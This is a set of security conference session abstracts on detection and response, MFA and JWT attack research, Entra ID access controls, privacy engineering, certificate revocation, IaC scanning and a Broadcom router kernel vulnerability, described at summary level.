You haven’t slept in days. Pager alerts at all hours. Constant firefights. How do you get out of this mess? This talk gives away all the secrets you’ll need to go from reactive chaos to building and running a finely tuned detection & response program (and finally get some sleep).
Gone are the days of buying the ol’ EDR/IDS/NGAV combo, throwing some engineers on an on-call rotation, and calling it your incident response team. You need a robust and comprehensive detection and response program to fight modern day attackers. But there’s a lot of challenges in the way: alert fatigue, tools are expensive, hiring talent is impossibly difficult, and your current team is overworked from constant firefights.
How do you successfully build a modern detection and response program, all while riding the rocket of never ending incidents and unforgiving on-call schedules?
This talk addresses the lack of a framework, which has led to ineffective, outdated, and after-thought detection and response programs. At the end of this talk, you will walk away with a better understanding of all the capabilities a modern program should have and a framework to build or improve your own.
Microsoft Azure and Entra ID have become mainstays in modern corporate environments. As cloud environments grow, so too does the complexity. Many organizations have implemented Multi-Factor Authentication and employ Conditional Access Policies (CAPs) within their Azure tenant to enforce MFA requirements. We'll walk through a technique we developed to bypass Browser-Based MFA to access Microsoft Outlook Web Application by leveraging an overly permissive Conditional Access Policy.
Nowadays, JSON Web Tokens are everywhere. They are used as session tokens, OAuth tokens or just to pass information between applications or microservices. By design, JWT contains a high number of security and cryptography pitfalls that creates interesting vulnerabilities. In this workshop, we are going to learn how to exploit some of those issues.
First, we are going to look at the old issues: the none algorithm, guessing/bruteforcing the hmac secret.
Then we will look at more recent issues like how an RSA public key can be computed from multiple signatures to exploit algorithm confusion and how the same attack can be done with ECDSA. We will also look at leveraging issues with the kid/jku/x5u. And finally how to leverage CVE-2022-21449 to bypass the signature mechanism.
Sun-tzu said it best: "If you know the enemy and know yourself, you need not fear the result of a hundred battles." Understanding the adversary is essential when formulating cyber defenses in modern times. Join us for an introduction to adversary emulation where we'll introduce some core concepts, terminology, and tooling with which you can build a FREE adversary emulation homelab.
Are you tired of constantly patching vulnerabilities in production systems? Would you prefer proactive security mitigation to reactive response? This presentation explores the lessons I learned building a culture of quality software engineering, and how that culture can mitigate vulnerabilities before they are ever written. The lessons discussed can help your organization break the inertia of endless patching, and instead benefit from consistent, meaningful improvement.
Privacy compliance is a hot, top-of-mind topic for legal, security, and governance teams alike, especially with the advent of things like GDPR and the Trans-Atlantic Data Privacy Framework. Here in Canada, we have PIPEDA. In the US, we have CCPA/CPRA, NYPA, etc. What do these acronyms mean? What do the regulations cover? And more importantly, how can we navigate this new era of data regulations, across legal, security, and governance, that doesn't involve overwhelming ourselves with immense amounts of paperwork?
We'll walk through the basic fundamentals of a Privacy Program that cover the typical broad set of data/privacy regulations, in addition to how they may work well (or not well!) with other existing security compliance/legislations. We'll cover the core software components required to support such a Privacy Program. Finally, we'll talk through how to build a successful Privacy Engineering team within your security organization that both complements both your existing security engineering needs in tandem with your Privacy Legal functions.
And if we have time, we can talk about lessons learnt along the way. :)
The web public key infrastructure is used to secure HTTPS connections between browsers and websites using certificates. Today, when something goes wrong, browsers can't reliably find out those certificates have been revoked. We examine past and future solutions to this problem, and how we can make progress on fixing revocation.
Conditional Access in Microsoft Entra ID, when tied with Mobile Application Management and Mobile Device Management in Microsoft Intune are the core pillars for building zero trust based access controls in Microsoft 365 and Azure published services. We will cover MDM and MAM policies, how device compliance is applied to Conditional Access by Intune when deploying authentication, and finishing off with a tested model for layered access, specifically as it relates to M365 in a variety of trust states.
We will review common IaC and container scanners in the context of a modern build pipeline. Using examples, we will show examples how different IaC tools may hide some complexity, but also make security relevant settings inaccessible. Furthermore, we will review how modern projects have evolved, and how infrastructure as code has changed the landscape. Using real-world open-source examples, we will examine untracked infrastructure configurations in projects and the potential consequences. We will finish by discussing how the whitebox security assessment fuelled by IaC may change risk and compliance assessments like SOC2 and HIPAA in the future.
This research uncovers the CVE-2023-31070 vulnerability, a concerning issue within the IoT Linux kernel space, specifically affecting the Broadcom BCM47xx SDK. This vulnerability resides in the Efficient Multicast Forwarding (EMF) slab-out-of-bounds write, and it has significant implications for IoT device security. The Broadcom BCM47xx SDK serves as the reference implementation in numerous router models, making it a ubiquitous presence in the IoT landscape. In fact, the issue affects router devices from at least 14 manufacturers, and more than 50 popular models, therefore affecting a significant market share of small office home networking devices.
The EMF module, responsible for optimizing multicast traffic, is a crucial component, particularly in applications like IPTV.
Within this SDK, a critical flaw lurks in the EMF kernel driver, emf.ko, primarily used for IGMP snooping. Through careful analysis and reverse engineering, the vulnerable code within emf.ko is dissected, revealing how an attacker can manipulate kernel module data structures with specifically crafted data. The ultimate goal of this exploitation is to achieve kernel-mode code execution, posing a substantial security risk.
To illustrate the practical implications of CVE-2023-31070, a demonstration is provided, showcasing how an attacker can trigger an out-of-bounds access in the kernel space, eventually causing system crashes. This demonstration, conducted on an ASUS AC87U device, serves as a real-world example of the potential consequences of this vulnerability.
This research journey also sheds light on the complexity of addressing such vulnerabilities. Close collaboration with Broadcom was required to get a fix, however, they have no control over the security update process of their OEMs and customers. In many cases, the affected models are no longer supported, even though tens of thousands of samples are still operated on public networks. This case study underscores the need for effective coordination in addressing vulnerabilities within interconnected systems.
This presentation will provide an in-depth examination of CVE-2023-31070, offering valuable insights into the IoT security landscape and the imperative to secure our interconnected devices. The talk aims to foster a discussion within the security community and raise awareness of the challenges posed by vulnerabilities in IoT ecosystems.